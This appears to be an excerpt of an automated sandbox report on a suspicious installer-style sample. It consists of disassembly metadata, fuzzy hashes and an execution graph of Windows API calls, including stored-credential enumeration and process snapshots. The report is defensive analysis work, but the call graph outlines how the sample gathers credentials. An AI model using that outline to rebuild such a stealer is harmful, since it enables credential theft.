                                                                                                                • Part of subcall function 333E35D2: RaiseException.KERNEL32(?,?,?,333E2925,00000000,00000000,00000000,?,?,?,?,?,333E2925,?,333F21B8), ref: 333E3632
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 333E2920
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                              • String ID: Unknown exception
                                                                                                              • API String ID: 3476068407-410509341
                                                                                                              • Opcode ID: 4748e8cd2c5c0ff0210ee9bb7658316953e602aa328c53e63c3695dabfeb28e2
                                                                                                              • Instruction ID: e5543433e9abb5fcb862a0d3b0dc69b99f8bd8c001d4e5567b2f69a2abfb64ce
                                                                                                              • Opcode Fuzzy Hash: 4748e8cd2c5c0ff0210ee9bb7658316953e602aa328c53e63c3695dabfeb28e2
                                                                                                              • Instruction Fuzzy Hash: 61F0AF3BD0832DBB8B00BEA4EC849AA776C9B00650F90C175F964D6990EF71EA66C5C1
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 00404F6E
                                                                                                              • CallWindowProcA.USER32(?,?,?,?), ref: 00404FBF
                                                                                                                • Part of subcall function 0040401A: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040402C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
• Instruction ID: cde12f86dd31b896884096c044580e22e17e4468508aba299e1a08f9367d6141
• Opcode Fuzzy Hash: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
• Instruction Fuzzy Hash: B90171B110420EAFDF209F11DD80A9B3666E7C4754F144037FB00762D1D73A9C62ABA9
APIs
• GetTickCount.KERNEL32 ref: 004059B4
• GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059CE
Strings
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: nsa
• API String ID: 1716503409-2209301699
• Opcode ID: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
• Instruction ID: 39b4e1e9eedef81f1669a342cc471fdfd7c96e097019c4c4e899424100dca803
• Opcode Fuzzy Hash: be632fe28ab69ff4c12b507213d52797c66cf3140a4a4b63bf78ed2c6fdf214e
• Instruction Fuzzy Hash: 86F08976748204ABD7104F56DC05BDB7B99DF91760F108037F904DA180D5B499548765
APIs
• GetOEMCP.KERNEL32(00000000,?,?,333E6C7C,?), ref: 333E6A1E
• GetACP.KERNEL32(00000000,?,?,333E6C7C,?), ref: 333E6A35
Strings
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID: |l>3
• API String ID: 0-3212150807
• Opcode ID: 6180087a7935150eb4016587a2eb1913b5fab1544441286b78dced9670bcb7f7
• Instruction ID: 9b7d72de712d9edddbd394baf2f50032fcfd35939c99fef429c17301a4741722
• Opcode Fuzzy Hash: 6180087a7935150eb4016587a2eb1913b5fab1544441286b78dced9670bcb7f7
• Instruction Fuzzy Hash: 74F03CB2980219CFEB10EFA4C84876C77B9FB41335F58C344E4289A1D5EB7159468B41
APIs
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004214E8,Error launching installer), ref: 004054B8
• CloseHandle.KERNEL32(?), ref: 004054C5
Strings
• Error launching installer, xrefs: 004054A6
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
• Instruction ID: 7b633475fa2e13aa519e78ab65903730338a863422e7bcfa27920a6c3387955a
• Opcode Fuzzy Hash: 44df9076715bb7e151bebb2f5864405cbbd02c1cd51f3942059a2279cc9d8a17
• Instruction Fuzzy Hash: 55E0E674A00209ABDB10EFA4DD4596B7BBDEB10305B408531B914E2160D774D410CA79
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23cb73ad5e10f4e344e57a815cb9849c44d7ebb0606a959d6cf4fd6ac0c83af7
• Instruction ID: 57e40c2acefb0b34dc51ba14adea8f2dd467a51599ed72ebaeee0bf9bad7d858
• Opcode Fuzzy Hash: 23cb73ad5e10f4e344e57a815cb9849c44d7ebb0606a959d6cf4fd6ac0c83af7
• Instruction Fuzzy Hash: 9AA14171E00229CFDB28CFA8C8547ADBBB1FB44305F15816ED816BB281D7785A96DF44
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b3f6be63239c0cb837da51a3d9f2134ef1b14dc2e083ec86415700d1a1d3e6b
• Instruction ID: 43f12e2563a4047fa425a185cdd3bc30ce3cfc84c0a70b15e8e3771f47715ab2
• Opcode Fuzzy Hash: 8b3f6be63239c0cb837da51a3d9f2134ef1b14dc2e083ec86415700d1a1d3e6b
• Instruction Fuzzy Hash: C3913070E00229CFDF28CF98C8547ADBBB1FB44305F15816AD816BB281D778AA96DF44
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d9fa1cb865db95249741f93cb8c753d7e4f9bb8adb072a23a7b5d4237c11c5eb
• Instruction ID: 8348384c2088d0dca10fb2cfce14f15a8a06df42cb65cfce77c7d545600b327b
• Opcode Fuzzy Hash: d9fa1cb865db95249741f93cb8c753d7e4f9bb8adb072a23a7b5d4237c11c5eb
• Instruction Fuzzy Hash: 2F813771D04228CFDF24DFA8C8847ADBBB1FB45305F25816AD416BB281C7789996DF04
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 179af5664f17e4f2403a1a693b6a24cb6119fcd0801561dfa3e1b49326d4cf15
• Instruction ID: b0014496198728110a5296264d01e6ecaf8aeebecb777455980bb60694c24f35
• Opcode Fuzzy Hash: 179af5664f17e4f2403a1a693b6a24cb6119fcd0801561dfa3e1b49326d4cf15
• Instruction Fuzzy Hash: B5818771D00228CFDF24DFA8C8447ADBBB1FB44301F11816AD956BB281C7786A96DF44
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21c63995844886ac2fe7fbd4dd860e07685d7144360ec0a582e920b02fde6c26
• Instruction ID: ae8010f5f00a2a00aaab6ae45f29b4f91a62fe5ecd20e2395cd8f48d9039e886
• Opcode Fuzzy Hash: 21c63995844886ac2fe7fbd4dd860e07685d7144360ec0a582e920b02fde6c26
• Instruction Fuzzy Hash: 54711471E00229CFDF24DF98C8547ADBBB1FB44305F15806AD816BB281D7389996DF44
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1baff631acb7ddbb7c96735cc376f86df403abe9831c442b317f501a77cb628
• Instruction ID: 6e96038cb0222d47830e4b58fd7c52cae377976e6dc55ad69c20d6e03a859a59
• Opcode Fuzzy Hash: e1baff631acb7ddbb7c96735cc376f86df403abe9831c442b317f501a77cb628
• Instruction Fuzzy Hash: 0A712371E00229CFDF28DF98C8547ADBBB1FB44305F15806AD816BB281D7789A96DF44
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 91970b9c9a707f7a07f11c7f1fa3da56f2db441975c94307291717d81ee5fd9b
• Instruction ID: e293682df0fe9d8d1d8f36ea8a561890eb7f7220d29e3ea09188f27b28daafc9
• Opcode Fuzzy Hash: 91970b9c9a707f7a07f11c7f1fa3da56f2db441975c94307291717d81ee5fd9b
• Instruction Fuzzy Hash: 3A713471E00229CFDF28DF98C8547ADBBB1FB44305F15806AD816BB281D778AA96DF44
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 004058E6
• lstrcmpiA.KERNEL32(00405B05,00000000), ref: 004058FE
• CharNextA.USER32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 0040590F
• lstrlenA.KERNEL32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 00405918
Memory Dump Source
• Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
• Instruction ID: c707f4e568105da07dfe4c817e4f3fc028cff82ea2bd98979edb1fd84d8cb9b2
                                                                                                              • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                                                              • Instruction Fuzzy Hash: 56F0C232604558FFC7129BA4DD0099EBBA8EF16360B2140AAE800F7211D274EE01ABA9

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:6.3%
                                                                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                                                                              Signature Coverage:3.2%
                                                                                                              Total number of Nodes:2000
                                                                                                              Total number of Limit Nodes:74
20 API calls 38313->38747 38314 445823 38314->38294 38336 4087b3 338 API calls 38314->38336 38327 409d1f 6 API calls 38315->38327 38328 445cc9 38316->38328 38834 4099c6 wcslen 38318->38834 38319 4456b2 38749 40b1ab free free 38319->38749 38321 40b2cc 27 API calls 38332 445a4f 38321->38332 38323 445be2 38322->38323 38334 40b2cc 27 API calls 38323->38334 38324 445d3d 38354 40b2cc 27 API calls 38324->38354 38325 445d88 memset memset memset 38337 414c2e 17 API calls 38325->38337 38763 409b98 GetFileAttributesW 38326->38763 38338 4459bc 38327->38338 38339 409d1f 6 API calls 38328->38339 38329 445879 38329->38305 38350 4087b3 338 API calls 38329->38350 38331->38277 38355 44594a 38331->38355 38711 409d1f wcslen wcslen 38332->38711 38344 445bf3 38334->38344 38336->38314 38347 445dde 38337->38347 38830 409b98 GetFileAttributesW 38338->38830 38349 445ce1 38339->38349 38340 445bb3 38837 445403 memset 38340->38837 38341 445680 38341->38319 38581 4087b3 memset 38341->38581 38353 409d1f 6 API calls 38344->38353 38345 445928 38345->38355 38764 40b6ef 38345->38764 38356 40b2cc 27 API calls 38347->38356 38854 409b98 GetFileAttributesW 38349->38854 38350->38329 38352 40b2cc 27 API calls 38361 445a94 38352->38361 38363 445c07 38353->38363 38364 445d54 _wcsicmp 38354->38364 38355->38282 38368 4459ed 38355->38368 38367 445def 38356->38367 38357 4459cb 38357->38368 38377 40b6ef 253 API calls 38357->38377 38716 40ae18 38361->38716 38362 44566d 38362->38275 38632 413d4c 38362->38632 38373 445389 259 API calls 38363->38373 38374 445d71 38364->38374 38437 445d67 38364->38437 38366 445665 38748 40b1ab free free 38366->38748 38375 409d1f 6 API calls 38367->38375 38368->38288 38368->38289 38369->38311 38369->38324 38369->38325 38370 445389 259 API calls 38370->38295 38379 445c17 38373->38379 38855 445093 23 API calls 38374->38855 38382 445e03 38375->38382 38377->38368 38378 4456d8 38384 40b2cc 27 API calls 38378->38384 38385 40b2cc 27 API calls 38379->38385 38381 44563c 38381->38366 38387 
4087b3 338 API calls 38381->38387 38856 409b98 GetFileAttributesW 38382->38856 38383 40b6ef 253 API calls 38383->38311 38389 4456e2 38384->38389 38390 445c23 38385->38390 38386 445d83 38386->38311 38387->38381 38750 413fa6 _wcsicmp _wcsicmp 38389->38750 38394 409d1f 6 API calls 38390->38394 38392 445e12 38398 445e6b 38392->38398 38405 40b2cc 27 API calls 38392->38405 38396 445c37 38394->38396 38395 4456eb 38401 4456fd memset memset memset memset 38395->38401 38402 4457ea 38395->38402 38403 445389 259 API calls 38396->38403 38397 445b17 38831 40aebe 38397->38831 38858 445093 23 API calls 38398->38858 38751 409c70 wcscpy wcsrchr 38401->38751 38754 413d29 38402->38754 38408 445c47 38403->38408 38409 445e33 38405->38409 38406 445e7e 38411 445f67 38406->38411 38414 40b2cc 27 API calls 38408->38414 38415 409d1f 6 API calls 38409->38415 38420 40b2cc 27 API calls 38411->38420 38412 445ab2 memset 38416 40b2cc 27 API calls 38412->38416 38418 445c53 38414->38418 38419 445e47 38415->38419 38421 445aa1 38416->38421 38417 409c70 2 API calls 38422 44577e 38417->38422 38423 409d1f 6 API calls 38418->38423 38857 409b98 GetFileAttributesW 38419->38857 38425 445f73 38420->38425 38421->38397 38421->38412 38426 409d1f 6 API calls 38421->38426 38723 40add4 38421->38723 38728 445389 38421->38728 38737 40ae51 38421->38737 38427 409c70 2 API calls 38422->38427 38428 445c67 38423->38428 38430 409d1f 6 API calls 38425->38430 38426->38421 38431 44578d 38427->38431 38432 445389 259 API calls 38428->38432 38429 445e56 38429->38398 38435 445e83 memset 38429->38435 38433 445f87 38430->38433 38431->38402 38439 40b2cc 27 API calls 38431->38439 38432->38295 38861 409b98 GetFileAttributesW 38433->38861 38438 40b2cc 27 API calls 38435->38438 38437->38311 38437->38383 38440 445eab 38438->38440 38441 4457a8 38439->38441 38442 409d1f 6 API calls 38440->38442 38443 409d1f 6 API calls 38441->38443 38444 445ebf 38442->38444 38445 4457b8 38443->38445 38446 40ae18 9 API calls 38444->38446 38753 409b98 
GetFileAttributesW 38445->38753 38456 445ef5 38446->38456 38448 4457c7 38448->38402 38450 4087b3 338 API calls 38448->38450 38449 40ae51 9 API calls 38449->38456 38450->38402 38451 445f5c 38453 40aebe FindClose 38451->38453 38452 40add4 2 API calls 38452->38456 38453->38411 38454 40b2cc 27 API calls 38454->38456 38455 409d1f 6 API calls 38455->38456 38456->38449 38456->38451 38456->38452 38456->38454 38456->38455 38458 445f3a 38456->38458 38859 409b98 GetFileAttributesW 38456->38859 38860 445093 23 API calls 38458->38860 38460->38256 38461->38262 38462->38256 38463->38254 38465 40c775 38464->38465 38862 40b1ab free free 38465->38862 38467 40c788 38863 40b1ab free free 38467->38863 38469 40c790 38864 40b1ab free free 38469->38864 38471 40c798 38472 40aa04 free 38471->38472 38473 40c7a0 38472->38473 38865 40c274 memset 38473->38865 38478 40a8ab 9 API calls 38479 40c7c3 38478->38479 38480 40a8ab 9 API calls 38479->38480 38481 40c7d0 38480->38481 38894 40c3c3 38481->38894 38485 40c877 38494 40bdb0 38485->38494 38486 40c86c 38936 4053fe 39 API calls 38486->38936 38487 40c7e5 38487->38485 38487->38486 38493 40c634 50 API calls 38487->38493 38919 40a706 38487->38919 38493->38487 39199 404363 38494->39199 38497 40bf5d 39219 40440c 38497->39219 38498 40bdee 38498->38497 38502 40b2cc 27 API calls 38498->38502 38499 40bddf CredEnumerateW 38499->38498 38503 40be02 wcslen 38502->38503 38503->38497 38510 40be1e 38503->38510 38504 40be26 wcsncmp 38504->38510 38507 40be7d memset 38508 40bea7 memcpy 38507->38508 38507->38510 38509 40bf11 wcschr 38508->38509 38508->38510 38509->38510 38510->38497 38510->38504 38510->38507 38510->38508 38510->38509 38511 40b2cc 27 API calls 38510->38511 38513 40bf43 LocalFree 38510->38513 39222 40bd5d 28 API calls 38510->39222 39223 404423 38510->39223 38512 40bef6 _wcsnicmp 38511->38512 38512->38509 38512->38510 38513->38510 38514 4135f7 39238 4135e0 38514->39238 38517 40b2cc 27 API calls 38518 41360d 38517->38518 38519 40a804 8 API calls 
38518->38519 38520 413613 38519->38520 38521 41361b 38520->38521 38522 41363e 38520->38522 38523 40b273 27 API calls 38521->38523 38524 4135e0 FreeLibrary 38522->38524 38525 413625 GetProcAddress 38523->38525 38526 413643 38524->38526 38525->38522 38527 413648 38525->38527 38526->38286 38528 413658 38527->38528 38529 4135e0 FreeLibrary 38527->38529 38528->38286 38530 413666 38529->38530 38530->38286 39241 4449b9 38531->39241 38534 444c1f 38534->38267 38535 4449b9 42 API calls 38537 444b4b 38535->38537 38536 444c15 38539 4449b9 42 API calls 38536->38539 38537->38536 39262 444972 GetVersionExW 38537->39262 38539->38534 38540 444b99 memcmp 38545 444b8c 38540->38545 38541 444c0b 39266 444a85 42 API calls 38541->39266 38545->38540 38545->38541 39263 444aa5 42 API calls 38545->39263 39264 40a7a0 GetVersionExW 38545->39264 39265 444a85 42 API calls 38545->39265 38548 40399d 38547->38548 39267 403a16 38548->39267 38550 403a09 39281 40b1ab free free 38550->39281 38552 403a12 wcsrchr 38552->38276 38553 4039a3 38553->38550 38556 4039f4 38553->38556 39278 40a02c CreateFileW 38553->39278 38556->38550 38557 4099c6 2 API calls 38556->38557 38557->38550 38559 414c2e 17 API calls 38558->38559 38560 404048 38559->38560 38561 414c2e 17 API calls 38560->38561 38562 404056 38561->38562 38563 409d1f 6 API calls 38562->38563 38564 404073 38563->38564 38565 409d1f 6 API calls 38564->38565 38566 40408e 38565->38566 38567 409d1f 6 API calls 38566->38567 38568 4040a6 38567->38568 38569 403af5 20 API calls 38568->38569 38570 4040ba 38569->38570 38571 403af5 20 API calls 38570->38571 38572 4040cb 38571->38572 39308 40414f memset 38572->39308 38574 404140 39322 40b1ab free free 38574->39322 38575 4040ec memset 38579 4040e0 38575->38579 38577 404148 38577->38341 38578 4099c6 2 API calls 38578->38579 38579->38574 38579->38575 38579->38578 38580 40a8ab 9 API calls 38579->38580 38580->38579 39335 40a6e6 WideCharToMultiByte 38581->39335 38583 4087ed 39336 4095d9 memset 38583->39336 38586 408809 
memset memset memset memset memset 38587 40b2cc 27 API calls 38586->38587 38588 4088a1 38587->38588 38589 409d1f 6 API calls 38588->38589 38590 4088b1 38589->38590 38591 40b2cc 27 API calls 38590->38591 38592 4088c0 38591->38592 38593 409d1f 6 API calls 38592->38593 38594 4088d0 38593->38594 38595 40b2cc 27 API calls 38594->38595 38596 4088df 38595->38596 38597 409d1f 6 API calls 38596->38597 38598 4088ef 38597->38598 38599 40b2cc 27 API calls 38598->38599 38600 4088fe 38599->38600 38601 409d1f 6 API calls 38600->38601 38602 40890e 38601->38602 38603 40b2cc 27 API calls 38602->38603 38604 40891d 38603->38604 38605 409d1f 6 API calls 38604->38605 38606 40892d 38605->38606 39355 409b98 GetFileAttributesW 38606->39355 38613 408953 38613->38341 38633 40b633 free 38632->38633 38634 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38633->38634 38635 413f00 Process32NextW 38634->38635 38636 413da5 OpenProcess 38635->38636 38637 413f17 CloseHandle 38635->38637 38638 413eb0 38636->38638 38639 413df3 memset 38636->38639 38637->38378 38638->38635 38641 413ebf free 38638->38641 38642 4099f4 3 API calls 38638->38642 39779 413f27 38639->39779 38641->38638 38642->38638 38643 413e1f 38644 413e37 GetModuleHandleW 38643->38644 39784 413959 38643->39784 39800 413ca4 38643->39800 38644->38643 38646 413e46 GetProcAddress 38644->38646 38646->38643 38648 413ea2 CloseHandle 38648->38638 38650 414c2e 17 API calls 38649->38650 38651 403eb7 38650->38651 38652 414c2e 17 API calls 38651->38652 38653 403ec5 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 403ee2 38654->38655 38656 409d1f 6 API calls 38655->38656 38657 403efd 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 403f15 38658->38659 38660 403af5 20 API calls 38659->38660 38661 403f29 38660->38661 38662 403af5 20 API calls 38661->38662 38663 403f3a 38662->38663 38664 40414f 33 API calls 38663->38664 38670 403f4f 38664->38670 38665 403faf 39814 40b1ab free free 38665->39814 38667 403f5b memset 38667->38670 38668 
403fb7 38668->38314 38669 4099c6 2 API calls 38669->38670 38670->38665 38670->38667 38670->38669 38671 40a8ab 9 API calls 38670->38671 38671->38670 38673 414c2e 17 API calls 38672->38673 38674 403d26 38673->38674 38675 414c2e 17 API calls 38674->38675 38676 403d34 38675->38676 38677 409d1f 6 API calls 38676->38677 38678 403d51 38677->38678 38679 409d1f 6 API calls 38678->38679 38680 403d6c 38679->38680 38681 409d1f 6 API calls 38680->38681 38682 403d84 38681->38682 38683 403af5 20 API calls 38682->38683 38684 403d98 38683->38684 38685 403af5 20 API calls 38684->38685 38686 403da9 38685->38686 38687 40414f 33 API calls 38686->38687 38688 403dbe 38687->38688 38689 403e1e 38688->38689 38691 403dca memset 38688->38691 38693 4099c6 2 API calls 38688->38693 38694 40a8ab 9 API calls 38688->38694 39815 40b1ab free free 38689->39815 38691->38688 38692 403e26 38692->38329 38693->38688 38694->38688 38696 414b81 9 API calls 38695->38696 38698 414c40 38696->38698 38697 414c73 memset 38700 414c94 38697->38700 38698->38697 39816 409cea 38698->39816 39819 414592 RegOpenKeyExW 38700->39819 38703 414c64 SHGetSpecialFolderPathW 38705 414d0b 38703->38705 38704 414cc1 38706 414cf4 wcscpy 38704->38706 39820 414bb0 wcscpy 38704->39820 38705->38321 38706->38705 38708 414cd2 39821 4145ac RegQueryValueExW 38708->39821 38710 414ce9 RegCloseKey 38710->38706 38712 409d62 38711->38712 38713 409d43 wcscpy 38711->38713 38712->38352 38714 409719 2 API calls 38713->38714 38715 409d51 wcscat 38714->38715 38715->38712 38717 40aebe FindClose 38716->38717 38718 40ae21 38717->38718 38719 4099c6 2 API calls 38718->38719 38720 40ae35 38719->38720 38721 409d1f 6 API calls 38720->38721 38722 40ae49 38721->38722 38722->38421 38724 40ade0 38723->38724 38727 40ae0f 38723->38727 38725 40ade7 wcscmp 38724->38725 38724->38727 38726 40adfe wcscmp 38725->38726 38725->38727 38726->38727 38727->38421 38729 40ae18 9 API calls 38728->38729 38734 4453c4 38729->38734 38730 40ae51 9 API calls 38730->38734 38731 4453f3 
